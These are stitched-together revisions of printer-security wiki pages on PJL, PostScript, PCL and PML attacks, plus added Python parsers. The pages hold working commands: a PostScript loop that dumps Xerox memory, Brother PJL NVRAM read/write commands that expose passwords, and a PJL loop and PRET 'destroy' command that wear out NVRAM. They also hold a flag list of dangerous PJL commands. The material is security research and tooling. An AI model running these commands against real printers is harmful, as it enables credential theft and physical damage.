printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. 
Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 5496983725e778b3bf1ad37a6e91b163d76cc342 171 170 2017-01-21T11:37:48Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. 
@PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. 
Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- a49705cbe1a9e1bb39055c00deddbd235f8f6d2c 170 169 2017-01-20T16:53:04Z Admin 1 wikitext text/x-wiki If an attacker gains access to the printer's memory or [https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM], she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. 
@PJL RNVRAM ADDRESS = X (read byte at location X) @PJL WNVRAM ADDRESS = X DATA = Y (write byte Y to location X) This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. '''How to test for this attack?''' The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................ '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript (Xerox) == Certain Xerox printer models have a proprietary PostScript ''vxmemfetch'' operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory <ref>''[https://infocon.org/cons/Hack%20In%20Paris/Hack%20In%20Paris%202012/Slides/Andrei-PostScript%20Danger%20Ahead.pdf PostScript: Danger Ahead?!]'', A. 
Costin, Hack in Paris, 2012</ref> as show below: <syntaxhighlight lang=postscript> /counter 0 def 50000 { /counter counter 1 add def currentdict /RRCustomProcs /ProcSet findresource begin begin counter 1 false vxmemfetch end end == counter } repeat </syntaxhighlight> '''How to test for this attack?''' Open a raw network connection (using ''netcat'' <ref>''[http://nc110.sourceforge.net/ Netcat – TCP/IP Swiss Army Knife]'', Hobbit, 1996</ref>, for example) to port 9100/tcp of the printer and send the PostScript code documented above. '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. __FORCETOC__ ---- 30d247febf6deee67a9d756e6a6ba24b7ada766a 169 2017-01-20T16:49:49Z Admin 1 Created page with "If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead t..." wikitext text/x-wiki If an attacker gains access to the printer's memory, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution. == PJL (Brother) == For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. 
----
PCL

The Printer Command Language (PCL) as specified in <ref>''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992</ref> is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, its origins date back to the early 80s: PCL 1 was introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros, both of which can be permanently downloaded to the device. They are however only referenced by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000</ref>. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below, where <Esc> denotes the escape character (0x1B) and <Esc>E is the printer reset command:

 <Esc>EHello world

Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturer's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may count as ‘misuse of service’ depending on the corporate policy.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]]
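The following Python code is an added example for this article; it is not PRET's code and does not reproduce PRET's on-device file system format. It shows the two sides of the macro trick described above: storing arbitrary bytes in a PCL 5 macro, and a small PCL 5 parser that splits a raw job into escape sequences and data so the stored bytes can be recovered again. The escape sequences used are the ones from HP's PCL 5 reference (macro ID, macro definition start/stop, make permanent, transparent print data); the macro number and the payload are constructed for the example.

```python
"""Added example for this article (not PRET's code and not its on-device file
format): store arbitrary bytes in a PCL 5 macro and parse them back out of a
raw job. The escape sequences used are from HP's PCL 5 Technical Reference:

  ESC E           printer reset (two-character sequence)
  ESC & f # Y     set macro ID           ESC & f 0 X   start macro definition
  ESC & f 1 X     stop definition        ESC & f 10 X  make macro permanent
  ESC & p # X     transparent print data: the next # bytes are data, not PCL

Wrapping the payload in transparent print data keeps ESC bytes inside the
stored file from being interpreted as commands.
"""
import re
from typing import Iterator, NamedTuple, Union

ESC = b"\x1b"


class Cmd(NamedTuple):
    prefix: str   # parameterized character, e.g. '&' ('' for two-char sequences)
    group: str    # group character, e.g. 'f'
    value: int    # numeric value, 0 if absent
    param: str    # parameter character, upper-cased, e.g. 'X'


class Data(NamedTuple):
    payload: bytes  # transparent print data or literal text


def store_as_macro(macro_id: int, payload: bytes, permanent: bool = True) -> bytes:
    """Return a PCL job that stores `payload` in macro number `macro_id`."""
    if not 0 <= macro_id <= 32767:
        raise ValueError("macro id out of range")
    job = ESC + b"E"                                       # reset
    job += ESC + b"&f%dY" % macro_id                       # select macro id
    job += ESC + b"&f0X"                                   # start definition
    job += ESC + b"&p%dX" % len(payload) + payload         # raw bytes
    job += ESC + b"&f1X"                                   # stop definition
    if permanent:
        job += ESC + b"&f10X"                              # survive reset
    return job + ESC + b"E"


_VALUE_RE = re.compile(rb"[+-]?\d*\.?\d*")


def _number(value: bytes) -> int:
    return int(float(value.decode("ascii"))) if re.search(rb"\d", value) else 0


def tokenize(job: bytes) -> Iterator[Union[Cmd, Data]]:
    """Split a PCL 5 byte stream into commands and data.

    Two-character sequences are ESC plus a byte 0x30-0x7E. Parameterized
    sequences are ESC, a byte 0x21-0x2F, a group byte, then value/parameter
    pairs: a lower-case parameter (0x60-0x7E) continues a combined sequence,
    an upper-case one (0x40-0x5E) terminates it. A terminating ESC&p#X is
    followed by # raw bytes that must not be parsed.
    """
    i, n, text = 0, len(job), bytearray()
    while i < n:
        if job[i] != 0x1B:
            text.append(job[i])
            i += 1
            continue
        if text:
            yield Data(bytes(text))
            text = bytearray()
        if i + 1 >= n:
            raise ValueError("dangling ESC at end of job")
        c = job[i + 1]
        if 0x21 <= c <= 0x2F:                      # parameterized sequence
            if i + 2 >= n:
                raise ValueError("truncated escape sequence")
            prefix, group, j = chr(c), chr(job[i + 2]), i + 3
            while True:
                m = _VALUE_RE.match(job, j)
                j = m.end()
                if j >= n:
                    raise ValueError("truncated escape sequence")
                p, j = job[j], j + 1
                cmd = Cmd(prefix, group, _number(m.group(0)), chr(p).upper())
                yield cmd
                if 0x40 <= p <= 0x5E:              # terminator
                    break
                if not 0x60 <= p <= 0x7E:
                    raise ValueError("invalid parameter character %r" % chr(p))
            i = j
            if cmd[:2] == ("&", "p") and cmd.param == "X":   # transparent data
                count = max(cmd.value, 0)
                if i + count > n:
                    raise ValueError("transparent print data runs past end of job")
                yield Data(job[i:i + count])
                i += count
        elif 0x30 <= c <= 0x7E:                    # two-character sequence
            yield Cmd("", "", 0, chr(c))
            i += 2
        else:
            raise ValueError("invalid escape sequence")
    if text:
        yield Data(bytes(text))


def extract_macros(job: bytes) -> dict:
    """Return {macro_id: bytes} for every macro defined in `job`: the data
    tokens seen between ESC&f0X and ESC&f1X, concatenated."""
    macros, macro_id, body = {}, None, None
    for tok in tokenize(job):
        if isinstance(tok, Cmd) and tok[:2] == ("&", "f"):
            if tok.param == "Y":
                macro_id = tok.value
            elif tok.param == "X" and tok.value == 0:
                if macro_id is None:
                    raise ValueError("macro definition without a macro id")
                body = bytearray()
            elif tok.param == "X" and tok.value == 1 and body is not None:
                macros[macro_id] = bytes(body)
                body = None
        elif isinstance(tok, Data) and body is not None:
            body += tok.payload
    return macros


if __name__ == "__main__":
    secret = b"user=admin\x1bE pass=hunter2\n"   # constructed; contains an ESC
    job = store_as_macro(1337, secret)
    print(job)
    print(extract_macros(job))
```

The parser is also a convenient way to audit captured PCL jobs on a print server: any job that defines macros and makes them permanent, without ever executing them, is using the printer as storage rather than printing.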
----
PDF

The Portable Document Format (PDF) was initially released by Adobe Systems in 1993 <ref>''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.</ref> and later became an ISO standard <ref>''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008</ref>. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further studied in this wiki.

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[PostScript]], [[PJL]]

----
PFT

PFT, libPJL and Hijetter were the first publicly available tools for network printer exploitation. They are written in C++/VC++ and were released by the legendary Phenoelit hacking group in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display. Furthermore, PFT allows penetration testers to set and crack PJL passwords.

== External links ==

* [http://www.phenoelit.org/hp/ Official website]

----
PJL

[[File:PJL-display.png|thumb|Classic prank: PJL displays ‘HACKED’]]

The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job: while <code>@PJL SET</code> only affects the current job, <code>@PJL DEFAULT</code> makes a setting permanent. PJL can also be used to change the printer's display or to read and write files on the device. There are many dialects, as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:

 @PJL SET PAPER=A4
 @PJL SET COPIES=10
 @PJL ENTER LANGUAGE=POSTSCRIPT

PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]].

→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]]
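As an added example, written for this article and not taken from PRET or from any print server, the Python code below parses the PJL envelope of a raw print job the way a print server sitting between clients and the printer could before forwarding it: it separates the PJL commands from the page description data that follows <code>@PJL ENTER LANGUAGE</code> and flags commands whose effect outlives the job (settings made permanent, file system access, vendor NVRAM access, display messages). The UEL sequence and command names are from HP's PJL reference; which commands are flagged is this example's own policy, and the sample job is constructed.

```python
"""Added example for this article (not PRET's code): inspect a raw print job
before it reaches the printer, separating the PJL commands from the page
description data and flagging commands whose effect outlives the job.

UEL and the command names are from HP's PJL Technical Reference; which
commands count as worth flagging is this example's own policy, not a list
from the article.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

UEL = b"\x1b%-12345X"                      # Universal Exit Language
_CMD_RE = re.compile(rb"@PJL[ \t]*([A-Z]*)[ \t]*([^\r\n]*)\r?\n")

# Everything not listed here is treated as affecting the current job only.
CATEGORIES = {
    "persistent": {"DEFAULT", "INITIALIZE"},            # written to NVRAM
    "filesystem": {"FSDOWNLOAD", "FSUPLOAD", "FSQUERY", "FSDIRLIST",
                   "FSDELETE", "FSMKDIR", "FSAPPEND", "FSINIT"},
    "vendor": {"RNVRAM", "WNVRAM"},                     # Brother NVRAM access
    "display": {"RDYMSG", "OPMSG", "STMSG"},            # control panel text
}


@dataclass
class PjlCommand:
    name: str
    args: str
    category: str


@dataclass
class JobReport:
    commands: List[PjlCommand] = field(default_factory=list)
    language: Optional[str] = None     # value of @PJL ENTER LANGUAGE=
    payload: bytes = b""               # the PDL data after the language switch
    findings: List[str] = field(default_factory=list)


def classify(name: str) -> str:
    for category, names in CATEGORIES.items():
        if name in names:
            return category
    return "job"


def inspect_job(job: bytes) -> JobReport:
    """Parse the PJL envelope of `job` and report what it does."""
    report = JobReport()
    if not job.startswith(UEL):
        report.findings.append("job does not start with UEL; no PJL parsed")
        report.payload = job
        return report
    pos = len(UEL)
    while pos < len(job):
        if job.startswith(UEL, pos):            # UEL may repeat between sections
            pos += len(UEL)
            continue
        m = _CMD_RE.match(job, pos)
        if m is None:                           # not a PJL line: stop parsing
            report.findings.append("non-PJL bytes at offset %d" % pos)
            break
        name = m.group(1).decode("ascii")
        args = m.group(2).decode("ascii", errors="replace").strip()
        pos = m.end()
        if not name:                            # bare "@PJL" header line
            continue
        category = classify(name)
        report.commands.append(PjlCommand(name, args, category))
        if category != "job":
            report.findings.append(f"{category}: @PJL {name} {args}".rstrip())
        if name == "FSDOWNLOAD":
            # The file body follows the command line and is binary; honour
            # SIZE= so its bytes are never mistaken for PJL or for a UEL.
            size = re.search(r"SIZE\s*=\s*(\d+)", args)
            pos += int(size.group(1)) if size else 0
        elif name == "ENTER":
            lang = re.search(r"LANGUAGE\s*=\s*(\S+)", args, re.I)
            report.language = lang.group(1).upper() if lang else None
            end = job.find(UEL, pos)            # PDL data runs up to next UEL
            report.payload = job[pos:] if end < 0 else job[pos:end]
            pos = len(job) if end < 0 else end
    return report


# Constructed sample job (not a real capture). It mixes the harmless settings
# shown above with a DEFAULT that persists and a file download whose body
# happens to start with the first bytes of a UEL.
SAMPLE_JOB = b"".join([
    UEL, b"@PJL\r\n",
    b"@PJL SET PAPER=A4\r\n",
    b"@PJL SET COPIES=10\r\n",
    b"@PJL DEFAULT COPIES=10\r\n",
    b'@PJL FSDOWNLOAD FORMAT:BINARY SIZE=5 NAME="0:/x"\r\n', b"\x1b%-12",
    b"@PJL ENTER LANGUAGE=POSTSCRIPT\r\n",
    b"%!PS\n(Hello) print\n",
    UEL, b"@PJL EOJ\r\n", UEL,
])

if __name__ == "__main__":
    report = inspect_job(SAMPLE_JOB)
    print("language:", report.language, "payload bytes:", len(report.payload))
    for finding in report.findings:
        print("flagged:", finding)
```

Honouring <code>SIZE=</code> on <code>FSDOWNLOAD</code> matters for any such filter: the file body is binary, so a line-oriented scanner that does not skip it can be desynchronised by a payload that embeds PJL-looking text or a UEL.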
→ ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ a187e7d0a9c98f5eb045f2009d25498cf7381f2f 76 64 2017-01-08T18:37:09Z Admin 1 wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997 p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. 
→ ''Related aricles:'' [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]] ------------ 5e439bf086659c4560938a1175e24aa02bb71d46 64 2017-01-08T15:35:03Z Admin 1 Created page with "The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>..." wikitext text/x-wiki The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997 p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below: @PJL SET PAPER=A4 @PJL SET COPIES=10 @PJL ENTER LANGUAGE=POSTSCRIPT PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]]. 
PML (page revision of 2017-06-25T11:23:20Z, Admin)

'''TBD: This article needs further explanation'''

The Printer Management Language (PML) is a proprietary language to control HP printers. It basically combines the features of [[SNMP]] with [[PJL]]. Publicly available documentation has not been released; however, parts of the standard were leaked by the [https://en.wikipedia.org/wiki/LPRng LPRng] project: the '''PJL Passthrough to PML and SNMP User’s Guide''' defines PML as ‘an object-oriented request-reply printer management protocol’ <ref>''[http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP User's Guide]'', HP Inc., 2000, p. 11</ref> and gives an introduction to the basics of the syntax.

PML is embedded within PJL and can be used to read and set SNMP values on a printer device. This is especially interesting if a firewall blocks access to SNMP services (161/udp) but an attacker is still able to print using one of the various techniques discussed in [[attack carriers]]. The use of PML within a print job to retrieve the <code>hrDeviceDescr</code> value (OID 1.3.6.1.2.1.25.3.2.1.3, the textual description of a device) is demonstrated below:

<syntaxhighlight lang=sh>
> @PJL DMINFO ASCIIHEX="000006030302010301"
< "8000000603030201030114106870204c617365724a65742034323530
</syntaxhighlight>

The rear part of the string returned by the printer, <code>6870204c617365724a65742034323530</code>, is hexadecimal for <code>hp LaserJet 4250</code> – equivalent to the [[SNMP|snmpget example]]. As can be seen, it is possible to invoke (a subset of) SNMP commands over PJL via PML. A security-sensitive use of PML is to reset HP printers to [[factory defaults]] via ordinary print jobs, therefore removing protection mechanisms like user-set passwords.
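As an added example (not code from this wiki, from HP's guide or from PRET), the following decoder parses the DMINFO request/reply pair quoted above and checks the reply against the request before trusting its payload. The byte layout (operation byte, status, OID type and length, value type and length) is inferred from that single captured exchange and is an assumption; the leaked HP guide remains the authoritative reference.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the DMINFO request and reply lines quoted on the page.
REQUEST_LINE = '@PJL DMINFO ASCIIHEX="000006030302010301"'
REPLY_LINE = '"8000000603030201030114106870204c617365724a65742034323530'

REPLY_FLAG = 0x80   # assumption: a reply echoes the request's first byte with bit 7 set
OID_TYPE = 0x00     # assumption: 0x00 marks an object identifier in the header


@dataclass
class PmlMessage:
    is_reply: bool
    status: int                 # reply status byte (assumed 0x00 = success); 0 for requests
    oid: bytes                  # raw PML object identifier bytes
    value_type: Optional[int]   # value type byte from the reply, None for requests
    value: Optional[bytes]      # value bytes from the reply, None for requests


def parse_ascii_hex(line: str) -> bytes:
    """Extract the ASCIIHEX payload from a DMINFO command line or a reply line."""
    m = re.search(r'"([0-9a-fA-F]+)"?', line)
    if m is None:
        raise ValueError("no ASCIIHEX payload found")
    hexstr = m.group(1)
    if len(hexstr) % 2:
        raise ValueError("odd-length hex payload")
    return bytes.fromhex(hexstr)


def decode_pml(raw: bytes) -> PmlMessage:
    """Decode one PML message. Layout assumed from the page's sample exchange:

    request: op | oid_type | oid_len | oid...
    reply:   op|0x80 | status | oid_type | oid_len | oid... | value_type | value_len | value...
    Every length is checked against the buffer, so a short or padded reply is rejected.
    """
    if len(raw) < 3:
        raise ValueError("truncated PML message")
    is_reply = bool(raw[0] & REPLY_FLAG)
    pos = 1
    status = 0
    if is_reply:
        status = raw[pos]
        pos += 1
    if len(raw) < pos + 2:
        raise ValueError("truncated PML header")
    oid_type, oid_len = raw[pos], raw[pos + 1]
    pos += 2
    if oid_type != OID_TYPE:
        raise ValueError(f"unexpected object identifier type {oid_type:#04x}")
    oid = raw[pos:pos + oid_len]
    pos += oid_len
    if len(oid) != oid_len:
        raise ValueError("OID length exceeds message")
    if not is_reply:
        return PmlMessage(False, status, oid, None, None)
    if len(raw) < pos + 2:
        raise ValueError("reply lacks value header")
    value_type, value_len = raw[pos], raw[pos + 1]
    pos += 2
    value = raw[pos:pos + value_len]
    if len(value) != value_len:
        raise ValueError("value length exceeds message")
    return PmlMessage(True, status, oid, value_type, value)


def device_description(request_line: str, reply_line: str) -> str:
    """Return the device description carried in a DMINFO exchange, after checking
    that the reply answers the OID that was requested and reports success."""
    req = decode_pml(parse_ascii_hex(request_line))
    rep = decode_pml(parse_ascii_hex(reply_line))
    if req.is_reply or not rep.is_reply:
        raise ValueError("request/reply roles are swapped")
    if req.oid != rep.oid:
        raise ValueError("reply OID does not match request OID")
    if rep.status != 0:
        raise ValueError(f"PML error status {rep.status:#04x}")
    # Escape anything non-ASCII instead of trusting device output blindly.
    return rep.value.decode("ascii", errors="backslashreplace")


if __name__ == "__main__":
    print(device_description(REQUEST_LINE, REPLY_LINE))   # hp LaserJet 4250
```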
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[SNMP]], [[Factory defaults]]

PRET (page revision of 2017-01-31T15:37:53Z, Admin)

The PRinter Exploitation Toolkit (PRET) is a Python tool developed at the University of Bochum to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]].
== External links ==
* [https://github.com/RUB-NDS/PRET Official website]
Physical damage (page revision of 2017-06-17T13:15:37Z, 216.117.236.42, edit summary: Cleanup)

Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]), which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets ‘flash chips would only sustain about 1000-2000 cycles of re-writing’ <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this many times on purpose is a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected, but fixed settings containing wrong values can make the device practically unusable.

== PJL ==

For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>:

 @PJL DEFAULT COPIES=X

In an evaluation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''Exploiting Network Printers'', J. Müller, 2016, p. 41</ref>. Some gave EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction, however, is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken.

'''Testing for the Attack'''

The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]], can be tested as follows:

 ./pret.py -q printer pjl
 Connection to printer established
 
 Welcome to the pret shell. Type help or ? to list commands.
 printer:/> destroy
 Warning: This command tries to cause physical damage to the
 printer NVRAM. Use at your own risk. Press CTRL+C to abort.
 Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
 Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
 [... wait for about 24 hours ...]
 I'm afraid. I'm afraid, Dave. Dave, my mind is going...
